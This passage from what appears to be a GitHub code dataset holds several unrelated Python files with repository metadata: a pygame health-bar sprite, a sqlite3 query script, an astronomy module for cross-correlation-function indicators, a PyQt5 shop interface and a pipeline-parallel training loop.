pygame\nfrom pygame.sprite import Sprite\n\n\n\nclass HP(Sprite):\n    def __init__(self,ai_settings,screen):\n        \"Initialize the HP bar\"\n        super().__init__()\n\n        self.screen = screen\n        self.ai_settings = ai_settings\n\n        # Load the HP bar images\n        self.image_100 = pygame.image.load(\"images\hp_full.png\")\n        self.image_70 = pygame.image.load(\"images\hp_70.png\")\n        self.image_50 = pygame.image.load(\"images\hp_50.png\")\n        self.image_30 = pygame.image.load(\"images\hp_30.png\")\n        self.rect = self.image_100.get_rect()\n        self.screen_rect = screen.get_rect()\n\n        # Position the HP bar\n        self.rect.centerx = 50\n        self.rect.bottom = 90\n\n    def blitme(self):\n        \"\"\"Draw the HP bar at the set position\"\"\"\n        if self.ai_settings.ship_hp/self.ai_settings.ship_max_hp == 1:\n            self.screen.blit(self.image_100, self.rect)\n        elif self.ai_settings.ship_hp/self.ai_settings.ship_max_hp >= 0.7:\n            self.screen.blit(self.image_70, self.rect)\n        elif self.ai_settings.ship_hp/self.ai_settings.ship_max_hp >= 0.5:\n            self.screen.blit(self.image_50, self.rect)\n        else:\n            self.screen.blit(self.image_30, self.rect)\n", "repo_name": "aba2222/alien_invasion_game", "sub_path": "health_point.py", "file_name": "health_point.py", "file_ext": "py", "file_size_in_byte": 1210, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.sprite.Sprite", "line_number": 6, "usage_type": "name"}, {"api_name": "pygame.image.load", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 18, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 18, "usage_type": "attribute"}]}
+{"seq_id": "22885065909", "text": "# -*- coding: utf-8 -*-\nimport sqlite3\n# import unicode\nimport sys\n\nconn = sqlite3.connect('test.db')\nconn.text_factory=str\nc = conn.cursor()\nc.execute(\"SELECT * from 测试双一流\")\n\nfor row in c:\n    print(\"ID = \", row[0])\n    print(\"NAME = \", str(row[1]).encode('utf-8'))\n    print(\"ADDRESS = \", str(row[2]).encode('gbk'))\n    print(\"SALARY = \", row[3], \"\\n\")\n\nconn.close()", "repo_name": "thorweiyan/curlGaoXiaoShuJu", "sub_path": "test.py", "file_name": "test.py", "file_ext": "py", "file_size_in_byte": 375, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sqlite3.connect", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "8117778286", "text": "from collections import Iterable\n\nimport numpy as np\nfrom os.path import basename\nimport math\nimport warnings\nfrom astropy.io import fits\nfrom cached_property import cached_property\n\nfrom .gaussian import gauss, gaussfit, FWHM as FWHMcalc, RV, RVerror, contrast\nfrom .bisector import BIS, BIS_HARPS as BIS_HARPS_calc\nfrom .vspan import vspan\nfrom .wspan import wspan\nfrom .keywords import getRVarray, getBJD\nfrom . import writers\n\n\nEPS = 1e-5  # all indicators are accurate up to this epsilon\nnEPS = abs(math.floor(math.log(EPS, 10)))  # number of decimals for output\n\n\ndef rdb_names(names):\n    \"\"\" Return the usual .rdb format names. 
\"\"\"\n r = []\n for name in names:\n if name.lower() in ('rv', 'vrad', 'radvel'):\n r.append('vrad')\n elif name.lower() in ('rve', 'svrad', 'error', 'err'):\n r.append('svrad')\n elif name.lower() in ('fwhm'):\n r.append('fwhm')\n elif name.lower() in ('bis', 'bisspan', 'bis_span'):\n r.append('bis_span')\n elif name.lower() in ('contrast'):\n r.append('contrast')\n else:\n r.append(name)\n return r\n\n\nclass Indicators:\n \"\"\" Class to hold CCF indicators \"\"\"\n def __init__(self, rv, ccf, RV_on=True, FWHM_on=True, BIS_on=True,\n Vspan_on=True, Wspan_on=True, contrast_on=True,\n BIS_HARPS=False):\n \"\"\"\n The default constructor takes `rv` and `ccf` arrays as input, see\n `Indicators.from_file` for another way to create the object from a CCF\n fits file. Keyword parameters turn specific indicators on or off.\n Is `BIS_HARPS` is True, the BIS is calculated using the same routine as\n in the HARPS pipeline.\n \"\"\"\n self.rv = rv\n self.ccf = ccf\n self.filename = None\n self.on_indicators = []\n if RV_on: \n self.on_indicators.append('RV')\n self.on_indicators.append('RVerror')\n if FWHM_on: self.on_indicators.append('FWHM')\n if contrast_on: self.on_indicators.append('contrast')\n if BIS_on: self.on_indicators.append('BIS')\n if Vspan_on: self.on_indicators.append('Vspan')\n if Wspan_on: self.on_indicators.append('Wspan')\n self.on_indicators_rdb = rdb_names(self.on_indicators)\n\n self._use_bis_from_HARPS = BIS_HARPS\n\n self._EPS = EPS\n self._nEPS = nEPS\n\n def __repr__(self):\n if self.filename is None:\n r = f'CCFindicators(RVmin={self.rv.min()}; '\\\n f'RVmax={self.rv.max()}; size={self.rv.size})'\n else:\n r = f'CCFindicators(CCF from {basename(self.filename)})'\n return r\n\n @classmethod\n def from_file(cls, filename, hdu_number=0, data_index=-1, **kwargs):\n \"\"\" \n Create an `Indicators` object from one or more fits files.\n \n Parameters\n ----------\n filename : str or list of str\n The name(s) of the fits file(s)\n hdu_number : int, default = 0\n The index of the HDU list which contains the CCF\n data_index : int, default = -1\n The index of the .data array which contains the CCF. 
The data will \n be accessed as ccf = HDU[hdu_number].data[data_index,:]\n \"\"\"\n if isinstance(filename, Iterable) and not isinstance(filename, str):\n # list of files\n N = len(filename)\n rv, ccf = [], []\n for i in range(N):\n f = filename[i]\n rv.append(getRVarray(f))\n hdul = fits.open(f)\n ccf.append(hdul[hdu_number].data[data_index, :])\n\n if isinstance(filename, str):\n # one file only\n rv = getRVarray(filename)\n hdul = fits.open(filename)\n ccf = hdul[hdu_number].data[data_index, :]\n else:\n raise ValueError(\n 'Input to `from_file` should be a string or list of strings.')\n\n I = cls(rv, ccf, **kwargs)\n I.filename = filename\n I.HDU = hdul\n\n return I\n\n @cached_property\n def RV(self):\n return RV(self.rv, self.ccf)\n\n @cached_property\n def RVerror(self):\n try:\n eccf = self.HDU[2].data[-1,:] # for ESPRESSO\n except Exception as e:\n warnings.warn(e)\n warnings.warn('Cannot access CCF uncertainties, using 1.0.')\n eccf = np.ones_like(self.rv)\n finally:\n return RVerror(self.rv, self.ccf, eccf)\n\n\n @cached_property\n def FWHM(self):\n return FWHMcalc(self.rv, self.ccf)\n\n @cached_property\n def BIS(self):\n if self._use_bis_from_HARPS:\n return BIS_HARPS_calc(self.rv, self.ccf)\n else:\n return BIS(self.rv, self.ccf)\n\n @cached_property\n def Vspan(self):\n return vspan(self.rv, self.ccf)\n\n @cached_property\n def Wspan(self):\n return wspan(self.rv, self.ccf)\n\n @cached_property\n def contrast(self):\n return contrast(self.rv, self.ccf)\n\n @property\n def all(self):\n return tuple(self.__getattribute__(i) for i in self.on_indicators)\n\n def to_dict(self):\n return writers.to_dict(self)\n \n def to_rdb(self, filename='stdout', clobber=False):\n return writers.to_rdb(self, filename, clobber)\n\ndef indicators_from_files(files, rdb_format=True, show=True, show_bjd=True,\n sort_bjd=True, **kwargs):\n\n if sort_bjd:\n files = sorted(files, key=getBJD)\n\n for j, f in enumerate(files):\n if show_bjd:\n bjd = getBJD(f)\n\n I = Indicators.from_file(f, **kwargs)\n if j == 0 and show:\n if rdb_format:\n lst = (['jdb'] + I.on_indicators_rdb) if show_bjd \\\n else I.on_indicators_rdb\n print('\\t'.join(lst))\n print('\\t'.join([len(s) * '-' for s in lst]))\n else:\n if show_bjd:\n print(['jdb'] + I.on_indicators)\n else:\n print(I.on_indicators)\n\n if rdb_format:\n print(\n '\\t'.join([f'{bjd:<.6f}'] + [f'{ind:<.5f}' for ind in I.all]))\n else:\n print((bjd, ) + I.all)\n", "repo_name": "MahmoudOshagh/iCCF", "sub_path": "iCCF/iCCF.py", "file_name": "iCCF.py", "file_ext": "py", "file_size_in_byte": 6237, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "math.floor", "line_number": 19, "usage_type": "call"}, {"api_name": "math.log", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 77, "usage_type": "call"}, {"api_name": "collections.Iterable", "line_number": 95, "usage_type": "argument"}, {"api_name": "keywords.getRVarray", "line_number": 101, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 102, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 102, "usage_type": "name"}, {"api_name": "keywords.getRVarray", "line_number": 107, "usage_type": "call"}, {"api_name": "astropy.io.fits.open", "line_number": 108, "usage_type": "call"}, {"api_name": "astropy.io.fits", "line_number": 108, "usage_type": "name"}, {"api_name": "gaussian.RV", "line_number": 122, "usage_type": "call"}, {"api_name": 
"cached_property.cached_property", "line_number": 120, "usage_type": "name"}, {"api_name": "warnings.warn", "line_number": 129, "usage_type": "call"}, {"api_name": "warnings.warn", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.ones_like", "line_number": 131, "usage_type": "call"}, {"api_name": "gaussian.RVerror", "line_number": 133, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 124, "usage_type": "name"}, {"api_name": "gaussian.FWHM", "line_number": 138, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 136, "usage_type": "name"}, {"api_name": "bisector.BIS_HARPS", "line_number": 143, "usage_type": "call"}, {"api_name": "bisector.BIS", "line_number": 145, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 140, "usage_type": "name"}, {"api_name": "vspan.vspan", "line_number": 149, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 147, "usage_type": "name"}, {"api_name": "wspan.wspan", "line_number": 153, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 151, "usage_type": "name"}, {"api_name": "gaussian.contrast", "line_number": 157, "usage_type": "call"}, {"api_name": "cached_property.cached_property", "line_number": 155, "usage_type": "name"}, {"api_name": "keywords.getBJD", "line_number": 173, "usage_type": "name"}, {"api_name": "keywords.getBJD", "line_number": 177, "usage_type": "call"}]} +{"seq_id": "5522512198", "text": "from PyQt5 import QtCore, QtGui, QtWidgets\r\n\r\n\r\nclass Ui_mainWindow(object):\r\n def setupUi(self, mainWindow):\r\n mainWindow.setObjectName(\"mainWindow\")\r\n mainWindow.resize(500, 750)\r\n \r\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)\r\n sizePolicy.setHorizontalStretch(0)\r\n sizePolicy.setVerticalStretch(0)\r\n sizePolicy.setHeightForWidth(mainWindow.sizePolicy().hasHeightForWidth())\r\n mainWindow.setSizePolicy(sizePolicy)\r\n mainWindow.setMinimumSize(QtCore.QSize(500, 750))\r\n mainWindow.setMaximumSize(QtCore.QSize(500, 750))\r\n \r\n self.centralwidget = QtWidgets.QWidget(mainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.mainLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.mainLabel.setGeometry(QtCore.QRect(175, 30, 150, 30))\r\n \r\n font = QtGui.QFont()\r\n font.setPointSize(16)\r\n \r\n self.mainLabel.setFont(font)\r\n self.mainLabel.setScaledContents(False)\r\n self.mainLabel.setAlignment(QtCore.Qt.AlignCenter)\r\n self.mainLabel.setObjectName(\"mainLabel\")\r\n \r\n self.shopButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.shopButton.setGeometry(QtCore.QRect(200, 150, 100, 40))\r\n self.shopButton.setObjectName(\"shopButton\")\r\n \r\n self.doneButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.doneButton.setGeometry(QtCore.QRect(375, 645, 100, 40))\r\n self.doneButton.setObjectName(\"doneButton\")\r\n \r\n self.resetButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.resetButton.setGeometry(QtCore.QRect(25, 645, 100, 40))\r\n self.resetButton.setObjectName(\"resetButton\")\r\n \r\n self.cartButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.cartButton.setGeometry(QtCore.QRect(200, 250, 100, 40))\r\n self.cartButton.setObjectName(\"cartButton\")\r\n \r\n self.outputLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.outputLabel.setGeometry(QtCore.QRect(50, 475, 400, 150))\r\n self.outputLabel.setObjectName(\"outputLabel\")\r\n 
\r\n self.cookieQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.cookieQuantity.setGeometry(QtCore.QRect(270, 150, 60, 40))\r\n self.cookieQuantity.setFont(font)\r\n self.cookieQuantity.setObjectName(\"cookieQuantity\")\r\n \r\n self.sandwichQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.sandwichQuantity.setGeometry(QtCore.QRect(270, 250, 60, 40))\r\n self.sandwichQuantity.setFont(font)\r\n self.sandwichQuantity.setObjectName(\"sandwichQuantity\")\r\n \r\n self.waterQuantity = QtWidgets.QTextEdit(self.centralwidget)\r\n self.waterQuantity.setGeometry(QtCore.QRect(270, 350, 60, 40))\r\n self.waterQuantity.setFont(font)\r\n self.waterQuantity.setObjectName(\"waterQuantity\")\r\n \r\n self.cookieButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.cookieButton.setGeometry(QtCore.QRect(350, 150, 100, 40))\r\n self.cookieButton.setObjectName(\"cookieButton\")\r\n \r\n self.sandwichButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.sandwichButton.setGeometry(QtCore.QRect(350, 250, 100, 40))\r\n self.sandwichButton.setObjectName(\"sandwichButton\")\r\n \r\n self.waterButton = QtWidgets.QPushButton(self.centralwidget)\r\n self.waterButton.setGeometry(QtCore.QRect(350, 350, 100, 40))\r\n self.waterButton.setObjectName(\"waterButton\")\r\n \r\n font.setPointSize(12)\r\n \r\n self.cookieLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.cookieLabel.setGeometry(QtCore.QRect(40, 150, 130, 40))\r\n self.cookieLabel.setFont(font)\r\n self.cookieLabel.setObjectName(\"cookieLabel\")\r\n \r\n self.sandwichLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.sandwichLabel.setGeometry(QtCore.QRect(40, 250, 150, 40))\r\n self.sandwichLabel.setFont(font)\r\n self.sandwichLabel.setObjectName(\"sandwichLabel\")\r\n \r\n self.waterLabel = QtWidgets.QLabel(self.centralwidget)\r\n self.waterLabel.setGeometry(QtCore.QRect(40, 350, 150, 40))\r\n self.waterLabel.setFont(font)\r\n self.waterLabel.setObjectName(\"waterLabel\")\r\n \r\n mainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(mainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 500, 20))\r\n self.menubar.setObjectName(\"menubar\")\r\n mainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(mainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n mainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(mainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(mainWindow)\r\n\r\n def retranslateUi(self, mainWindow):\r\n _translate = QtCore.QCoreApplication.translate\r\n mainWindow.setWindowTitle(_translate(\"mainWindow\", \"Michael\\'s Shop\"))\r\n self.mainLabel.setText(_translate(\"mainWindow\", \"Main Menu\"))\r\n self.shopButton.setText(_translate(\"mainWindow\", \"Shop!\"))\r\n self.doneButton.setText(_translate(\"mainWindow\", \"Done\"))\r\n self.resetButton.setText(_translate(\"mainWindow\", \"Reset Cart\"))\r\n self.cartButton.setText(_translate(\"mainWindow\", \"View Cart\"))\r\n self.outputLabel.setText(_translate(\"mainWindow\", \"\"))\r\n self.cookieQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.sandwichQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.waterQuantity.setText(_translate(\"mainWindow\", '1'))\r\n self.cookieButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.sandwichButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.waterButton.setText(_translate(\"mainWindow\", \"Add to cart\"))\r\n self.cookieLabel.setText(_translate(\"mainWindow\", \"Cookie - $1.50 ea\"))\r\n 
self.sandwichLabel.setText(_translate(\"mainWindow\", \"Sandwich - $1.50 ea\"))\r\n self.waterLabel.setText(_translate(\"mainWindow\", \"Water - $1.50 ea\"))\r\n", "repo_name": "seorsum1/Project-1", "sub_path": "mainUI.py", "file_name": "mainUI.py", "file_ext": "py", "file_size_in_byte": 6186, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PyQt5.QtWidgets.QSizePolicy", "line_number": 9, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 14, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QSize", "line_number": 15, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 15, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QWidget", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt5.QtGui.QFont", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt5.QtGui", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.Qt", "line_number": 27, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 27, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 30, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 31, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 31, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 34, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 35, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 35, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 38, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 38, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 39, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 39, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 42, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 42, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 43, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 43, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 46, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 47, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 47, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 50, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 50, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 51, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 51, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 55, "usage_type": "call"}, 
{"api_name": "PyQt5.QtWidgets", "line_number": 55, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 56, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 56, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTextEdit", "line_number": 60, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 60, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 61, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 61, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 65, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 66, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 69, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 69, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 70, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 70, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 73, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 73, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 74, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 74, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 79, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 80, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 80, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 84, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 84, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 85, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 85, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QLabel", "line_number": 89, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 89, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 90, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 90, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QMenuBar", "line_number": 95, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 95, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QRect", "line_number": 96, "usage_type": "call"}, {"api_name": "PyQt5.QtCore", "line_number": 96, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QStatusBar", "line_number": 99, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 99, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QMetaObject.connectSlotsByName", "line_number": 104, "usage_type": "call"}, {"api_name": "PyQt5.QtCore.QMetaObject", "line_number": 104, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 104, "usage_type": "name"}, {"api_name": "PyQt5.QtCore.QCoreApplication", "line_number": 107, "usage_type": "attribute"}, {"api_name": "PyQt5.QtCore", "line_number": 107, "usage_type": "name"}]} +{"seq_id": "17121482673", "text": "import math\nimport os\nimport time\nimport warnings\n\nimport torch\n\nfrom pipe.pipeline import SinglePartitionManager\nfrom pipe.pipeline.trainers.statistics import Stats\nfrom pipe.prepare_pipeline import SmallerLastBatchPolicy, 
DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY\n\n\ndef training_loop(args, logger, train_dl, test_dl,\n is_last_partition, partition: SinglePartitionManager, statistics: Stats, train_dl_len,\n test_dl_len, samplers):\n # Prepare for loop\n last_batch_smaller_n_micro_batches_policy = getattr(args, \"last_batch_smaller_n_micro_batches_policy\",\n DEFAULT_STEP_EVERY_SMALLER_LAST_BATCH_POLICY)\n\n save_checkpoint_every_x_epochs = approximate_checkpoint_every_x_epochs(args, train_dl_len)\n\n epochs = 0\n steps = 0\n total_epoch_times_list = []\n train_epochs_times_list = []\n cp_saver = CheckpointsSaver(args)\n\n logger.info(f\"flush rate {args.flush_rate}\")\n logger.info(f\"Running for {args.epochs} epochs and {args.steps} steps\")\n if args.flush_rate >= 0:\n raise NotImplementedError()\n\n train_batches_limit = getattr(args, \"train_batches_limit\", train_dl_len)\n test_batches_limit = getattr(args, \"test_batches_limit\", test_dl_len)\n\n if getattr(args, \"train_batches_limit\", -1) > 0:\n warnings.warn(\n \"(dev feature) hard limiting train batches per flush: \"\n \"different last batch not supported, messages may get truncated\")\n\n if getattr(args, \"test_batches_limit\", -1) > 0:\n warnings.warn(\n \"(dev feature) hard limiting test batches per flush: \"\n \"different last batch not supported, messages may get truncated\")\n\n train_batches_limit = train_dl_len if train_batches_limit < 0 else train_batches_limit\n test_batches_limit = test_dl_len if test_batches_limit < 0 else test_batches_limit\n\n # Here comes utility functions: run_eval and run_train\n def run_eval(eval_batches_to_run):\n logger.info(f\"Running eval\")\n if eval_batches_to_run == 0:\n partition.eval()\n if statistics:\n statistics.eval()\n return False\n if test_dl:\n partition.set_dataloader(test_dl, eval_batches_to_run)\n partition.eval()\n if statistics:\n statistics.eval()\n\n with torch.no_grad(): # TODO maybe remove this?\n partition.run_forward_until_flush(eval_batches_to_run)\n\n # eval_epochs_times_list.append(time.time() - eval_epoch_start_time)\n if is_last_partition:\n statistics.last_partition_on_epoch_end()\n # NOTE: in eval() only last partition computes statistics\n # else:\n # statistics.non_last_partition_on_epoch_end()\n return True\n\n def run_train(train_batches_to_run):\n logger.info(f\"Running train\")\n\n train_epoch_start_time = time.time()\n if train_batches_to_run == 0:\n return False\n # Set Dataloader\n if train_dl:\n partition.set_dataloader(train_dl, train_batches_to_run)\n # Start training\n partition.train()\n if statistics:\n statistics.train()\n\n if args.flush_rate > 0:\n for _ in range(0, train_batches_to_run, args.flush_rate):\n partition.run_until_flush(args.flush_rate)\n reminder = train_batches_to_run % args.flush_rate\n if reminder > 0:\n logger.info(f\"Warning: will run for reminder {reminder} to finish epoch\")\n partition.run_until_flush(reminder)\n # TODO: allow statistics between flushes (e.g eval)\n\n if not partition.trainer.PER_STEP_SCHEDULER:\n partition.lr_scheduler.step()\n else:\n partition.run_until_flush(train_batches_to_run)\n\n train_epochs_times_list.append(time.time() - train_epoch_start_time)\n\n if is_last_partition:\n statistics.last_partition_on_epoch_end()\n else:\n statistics.non_last_partition_on_epoch_end()\n return True\n\n # Actual training loop\n while epochs < args.epochs or args.epochs < 0:\n for s in samplers:\n s.set_epoch(epochs)\n\n (reminder_micro_batches,\n train_batches_limit_to_use) = get_micro_batches_until_flush(args,\n 
train_batches_limit,\n steps,\n last_batch_smaller_n_micro_batches_policy,\n logger, partition)\n\n if train_batches_limit_to_use <= 0:\n logger.info(\n f\"breaking early: \"\n f\" can't complete a full step with {args.step_every} gradient accumulations.\")\n break\n epoch_start_time = time.time()\n\n # TODO: flush every 1000\n did_train = run_train(train_batches_limit_to_use)\n\n did_eval = run_eval(test_batches_limit)\n\n epochs += 1\n if did_train:\n floor_steps = args.steps > 0 \\\n and reminder_micro_batches \\\n and last_batch_smaller_n_micro_batches_policy == SmallerLastBatchPolicy.DropReminder\n if floor_steps:\n steps += math.floor(train_batches_limit_to_use / args.step_every)\n else:\n steps += math.ceil(train_batches_limit_to_use / args.step_every)\n\n is_last = (0 < args.epochs <= epochs) or (0 < args.steps <= steps)\n if is_last or epochs % save_checkpoint_every_x_epochs == 0:\n cp_saver.maybe_save_checkpoint(partition.partition.layers, steps)\n\n total_epoch_time = (time.time() - epoch_start_time)\n total_epoch_times_list.append(total_epoch_time)\n # if is_last_partition\n if args.local_rank == args.world_size - 1:\n logger.info('-' * 89)\n # ms/batch {:5.2f}\n info_str = '| end of epoch {:3d} | time: {:5.2f}s | steps: {:5d}'.format(\n epochs, total_epoch_time, steps)\n if did_train:\n info_str += statistics.get_epoch_info_str(is_train=True)\n if did_eval:\n info_str += statistics.get_epoch_info_str(is_train=False)\n\n logger.info(info_str)\n logger.info('-' * 89)\n\n if 0 < args.steps <= steps:\n logger.info(\n f\"Finished all steps. Total steps:{steps}, rank:{args.local_rank}\"\n )\n break # steps condition met\n elif getattr(args, \"patience\", False):\n if args.world_size - 1:\n assert is_last_partition\n # TODO: Try catch? \n should_early_stop = should_stop_early(\n args, statistics.get_metric_for_early_stop(), logger)\n data = torch.tensor(int(should_early_stop))\n else:\n data = torch.tensor(int(False)) # create buffer\n\n torch.distributed.broadcast(data, args.world_size - 1)\n should_early_stop = data.item()\n if should_early_stop:\n break\n\n return total_epoch_times_list, train_epochs_times_list\n\n\ndef get_micro_batches_until_flush(args, train_batches_limit, steps, step_every_smaller_last_batch_policy,\n logger, partition):\n if args.steps > 0:\n steps_left = args.steps - steps\n # TODO: it can be more fine-grained depends on policy but I leave it for now.\n batches_left = steps_left * args.step_every\n train_batches_limit_to_use = min(train_batches_limit, batches_left)\n\n if batches_left < train_batches_limit:\n # Re-define last batch train shapes.\n # now, the last batch shapes are not smaller.\n logger.info(\n \"batches_left are smaller than dataloader or limit: killing comm_handler.last_batch_train_shapes\")\n partition.comm_handler.last_batch_train_shapes = None\n\n # handle step every.\n # if we don't do anything, we will do:\n # `train_batches_limit` batches\n # which are (train_batches_limit // args.step_every) steps.\n # So the reminder is problematic\n # we can either:\n # (1) take a smaller step for it (proportional to number of grad accumulations taken).\n # (2) drop 